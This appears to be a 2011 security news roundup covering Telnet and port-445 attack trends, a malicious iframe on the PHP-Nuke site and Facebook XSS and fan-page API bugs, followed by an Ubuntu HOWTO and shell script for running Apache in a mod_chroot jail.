Telnet is a remote access tool used to log into remote servers, but it has been gradually replaced by SSH, also known as Secure Shell. Administrators are generally advised to disable Telnet if the protocol is not used, to prevent attacks targeting it, but some forget.
Although those attacks originated from mobile networks, Akamai said it did not appear that mobile devices were the source.
"As noted previously, we believe that the observed attack traffic that is originating from known mobile networks is likely being generated by infected PC-type clients connecting to wireless networks through mobile broadband technologies and not by infected smartphones or similar mobile devices," according to the report.
Including all types of attack traffic sources, about 17 percent of attacks were directed at Telnet. Port 23 was "overwhelmingly the top targeted port for attacks" in Egypt, Peru and Turkey, Akamai said.
"It is not clear if there is a common thread that connects these three countries, nor whether these observed attacks were brute-force login attempts or some other botnet-related traffic," the report said.
Akamai found that Port 445, which is a commonly used port for Microsoft products, was the most targeted one, although the attacks declined. The attacks peaked more than a year ago due to Conficker, a worm that rapidly spread and targeted the port.
"While the percentages are still fairly significant, this decline may signal ongoing efforts by network service providers to identify and isolate infected systems, as well as ongoing efforts to patch and/or upgrade infected systems," the report said.
Port 445 attacks were responsible for much of the attack traffic in Brazil, Germany, Italy, Russia, Taiwan and the US. In China, however, attacks against SSH, which runs on Port 22, were more common than those against Port 445, Akamai said.

Source: http://www.pcworld.com/businesscenter/article/217922/hackers_turn_back_the_clock_with_telnet_attacks.html

Malicious Iframe infects PHP-Nuke site....again!

The official PHP-Nuke site has had a malicious IFrame embedded in it since 17/01/2011, but as of today it still has not been cleaned up and removed.

The news below is from 17/01/2011.



Last May, I blogged about PHP-Nuke's official site being hacked. Imagine my surprise when I saw the site come up again in my malware feed.
I looked for the contact details on the site and found that I would have to register in order to give them details of the hack and advice on how to clean up. Doing so would risk giving, at the very least, my email address to the hackers who had compromised the security. Not surprisingly, I declined that tempting offer.
The WHOIS for the website shows that the Registrant is "Domains by Proxy, Inc." and from my many years experience in analysing spam, I am now accustomed to expecting the worst from sites registered with this type of name. Back to square one...again.
So why am I blogging about the site hack without first informing the owner?
  • They have previous history in leaving the door open to attacks
  • Publishing articles and giving them a spotlight is a surefire way of getting them to fix the issue
  • They seem not to have learned the lessons of their previous security breach.
In my previous blog entry "What does PHP stand for? Probable Hacked Page?", the attack is similar. Here is the current version:
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
You will see that the Apache and SSL versions have been upgraded (probably due to the OS), but the PHP version has not. The PHP site says that they currently have two versions released (5.3.5 and 5.2.17).


Source: http://nakedsecurity.sophos.com/2011/01/17/malicious-iframe-infects-php-nuke-site-again/

Cross Site Scripting on Facebook!!!

XSS vulnerabilities have been found on Facebook; one has been fixed and one has not.

XSS on Facebook.com, fix one and unfix one (27/01/2011 21:09 +7)



Source: http://www.xssed.com/

Mark Zuckerberg fan page hacked on Facebook: What really happened?

Following yesterday's news that Mark Zuckerberg's Facebook Fan Page was hacked, it turns out the cause was an API bug that allowed the hacker to post on that Wall. It is not certain whether this is the same vulnerability that hit the Facebook Fan Page of French President Nicolas Sarkozy (about a week ago), but what is certain is that the Facebook Security Team has already fixed the bug.

There was a lot of hoo-ha and speculation yesterday after Mark Zuckerberg's official Facebook fan page was updated with an unauthorised post.
At first Facebook declined to comment on what - at first glance - appeared to be an embarrassing security faux pas by Zuckerberg or one of his staff authorised to update the page. Understandably there was speculation that Zuckerberg or one of his colleagues might have had their passwords guessed or stolen, or perhaps had been 'sidejacked' by a tool such as FireSheep while using an unencrypted free WiFi hotspot.
Those were certainly our first thoughts, but now new information shared by Facebook's security team with the press tells a different story.
For instance, CNET's Elinor Mills reports that Facebook discovered that an API bug allowed unauthorised parties to post status updates to public Facebook fan pages.
This meant that personal information wasn't stolen from anyone's Facebook account - which is a very good thing.
So, it wasn't a story of a 26-year-old logging in at Starbucks and not realising that someone could be intercepting the communications. And it wasn't a tale of a junior member of staff choosing a password like "123456789" for their Facebook account, and being given the keys to administer a page with 2.8 million fans.
Those kinds of mistakes aren't uncommon, of course, and are security issues which you should be mindful of if you are responsible for the protection of computers and online activity inside your own organisation.
Instead, it turns out that the true story of the Zuckerberg fan page hack is much worse. Because a vulnerability in the way that Facebook was coded allowed unauthorised parties to post updates to pages, which could have potentially been used for the purposes of phishing, spam and even malicious attack.
Because it wasn't just Zuckerberg's fan page which was affected. Facebook declined to say which other pages had been hit by hackers exploiting the vulnerability - but it appears that other "high-profile" pages were also impacted. Facebook has not revealed whether they believed that French President Nicolas Sarkozy's fan page (which was also breached earlier this week) had been affected by the same bug.
So, what does this mean for you if you're a sysadmin responsible for securing your company's Facebook presence?
Well, the good news is that Facebook says the API bug has now been fixed. They haven't, however, said if they have informed the owners of any other Facebook fan pages or removed posts which may have been published via the flaw.
So, if you are the administrator of a popular page on Facebook it wouldn't do any harm to check that all is in order. You may also want to ensure that your public forums are regularly monitored just in case a similar incident occurs in the future, which might result in your Facebook fans receiving unauthorised updates.
After all, would the API vulnerability have been found so promptly if it hadn't impacted the official fan page of Facebook's CEO?
Furthermore, now would be a good time to audit your Facebook page administrators - ask yourself who has access to post to your company's pages and are they following sensible security practices (such as unique, hard-to-crack passwords and use of https when accessing the site).
This may not have been the issue in the case of the Zuckerberg fan page defacement, but it still makes a lot of good sense to follow these guidelines inside your company.

Source :: http://nakedsecurity.sophos.com/2011/01/27/mark-zuckerberg-fan-page-hacked-on-facebook-what-really-happened/

How to Chroot Jail Apache2 with mod_chroot

Description mod_chroot

mod_chroot is a module for the apache webserver to easily run the httpd in a chroot (especially important for all the scripts). Because of this, scripts cannot affect anything outside the chroot, which makes it much more difficult for an attacker to gain access to a server through the webserver.
NOTE: apache-2.2.10 and higher has built-in chroot handling and the mod_chroot module should not be used.

Why is it so fancy?

The good thing about this module is that you don't have to maintain a chroot containing every file the apache httpd may need (libraries, etc.).

TODO

  • Include a solution to handle sending email from the chroot with PHP mail() function. Several possibilities are available. Didn't test any because I didn't need it myself.
  • Add more information for services which might be affected.
  • Include information regarding DNS resolving.

HOWTO

It's aimed at my local setup so you might want to change some paths/leave some parts out. I decided to locate the chroot at /var/chroot/apache

Install & Configure

install the module

apt-get install libapache2-mod-chroot

enable the module

a2enmod mod_chroot

set chroot path

echo "ChrootDir /var/chroot/apache" > /etc/apache2/conf.d/mod_chroot

Build chroot

create the chroot directory

mkdir -p /var/chroot/apache

apache needs this to run

mkdir -p /var/chroot/apache/var/run

PHP5 Session stuff

Some PHP5 programs might need this. At least dokuwiki wanted to create some session file (maybe you don't need this)
mkdir -p /var/chroot/apache/var/lib/php5
use chmod to set the php5 dir to drwx-wx-wt (mode 1733)

Fixing up mod_user

In case you want to use mod_user for the personal webspaces of users (hostname/~username)

/home and /etc/passwd are necessary in the chroot

mkdir -p /var/chroot/apache/home
mkdir -p /var/chroot/apache/etc
touch /var/chroot/apache/etc/passwd
echo "/home /var/chroot/apache/home none bind 0 0" >> /etc/fstab
echo "/etc/passwd /var/chroot/apache/etc/passwd none bind 0 0" >> /etc/fstab
obviously you also have to mount them (mount -a)

Fix apache2ctl

ln -s /var/chroot/apache/var/run/apache2.pid /var/run/apache2.pid

Finish it up

restart apache2 to load mod_chroot

/etc/init.d/apache2 restart
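The steps above, collected into one rerunnable script. This is an added example and not the Ubuntu wiki's own code; every path is a parameter so the functions can be exercised against a scratch directory before touching a live system, and the defaults reproduce the page's layout (/var/chroot/apache, /etc/apache2/conf.d/mod_chroot, /etc/fstab). The "apply" argument, the function names and the CHROOT variable are this example's own conventions. It also fixes one thing a practitioner would want: the page's plain `echo >> /etc/fstab` adds a duplicate bind entry every time it is run, so here an entry is only appended if it is not already present.

```shell
#!/bin/sh
# Added example (not from the Ubuntu wiki page): build the mod_chroot skeleton
# described in the HOWTO. All paths are parameters; run with "apply" as root
# to use the page's defaults on the real system.
set -eu

# Create the directories the HOWTO needs inside the chroot:
#   var/run       apache's pid/socket files
#   var/lib/php5  PHP session files, mode drwx-wx-wt (1733) so the web user can
#                 create session files but cannot list or remove other users' files
#   home, etc     bind-mount targets for mod_user (/home and /etc/passwd)
build_chroot_skeleton() {
    root="$1"
    mkdir -p "$root/var/run" "$root/var/lib/php5" "$root/home" "$root/etc"
    chmod 1733 "$root/var/lib/php5"
    # empty placeholder; the real /etc/passwd is bind-mounted over it
    [ -e "$root/etc/passwd" ] || : > "$root/etc/passwd"
}

# Write the ChrootDir directive. Using > (not >>) keeps the file to one line
# when the script is run again.
write_chroot_conf() {
    confdir="$1"; root="$2"
    mkdir -p "$confdir"
    printf 'ChrootDir %s\n' "$root" > "$confdir/mod_chroot"
}

# Append a bind-mount line to fstab only if an identical line is not already
# there (the page's "echo >> /etc/fstab" duplicates it on every rerun).
add_bind_entry() {
    fstab="$1"; src="$2"; dst="$3"
    line="$src $dst none bind 0 0"
    if ! grep -qxF -- "$line" "$fstab" 2>/dev/null; then
        printf '%s\n' "$line" >> "$fstab"
    fi
}

# Point the system pid file at the one apache writes inside the chroot, so
# apache2ctl can still find the running process (the "Fix apache2ctl" step).
link_pidfile() {
    root="$1"; rundir="$2"
    mkdir -p "$rundir"
    ln -sf "$root/var/run/apache2.pid" "$rundir/apache2.pid"
}

# Permission string of a path in ls form (e.g. drwx-wx-wt); used to verify the
# PHP session directory after the build.
perm_string() {
    ls -ld "$1" | cut -c1-10
}

# Full run with the page's defaults; only executed when invoked as "script apply".
if [ "${1:-}" = "apply" ]; then
    CHROOT=${CHROOT:-/var/chroot/apache}
    build_chroot_skeleton "$CHROOT"
    write_chroot_conf /etc/apache2/conf.d "$CHROOT"
    add_bind_entry /etc/fstab /home "$CHROOT/home"
    add_bind_entry /etc/fstab /etc/passwd "$CHROOT/etc/passwd"
    link_pidfile "$CHROOT" /var/run
    mount -a
    echo "chroot skeleton ready at $CHROOT; now: a2enmod mod_chroot && /etc/init.d/apache2 restart"
fi
```

Enabling the module and restarting apache are left as the page's own commands (a2enmod mod_chroot, /etc/init.d/apache2 restart) because they are the only steps that change the running service; everything before them can be rehearsed under a scratch root such as CHROOT=/tmp/apache-chroot.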
 
Source: https://wiki.ubuntu.com/ModChroot 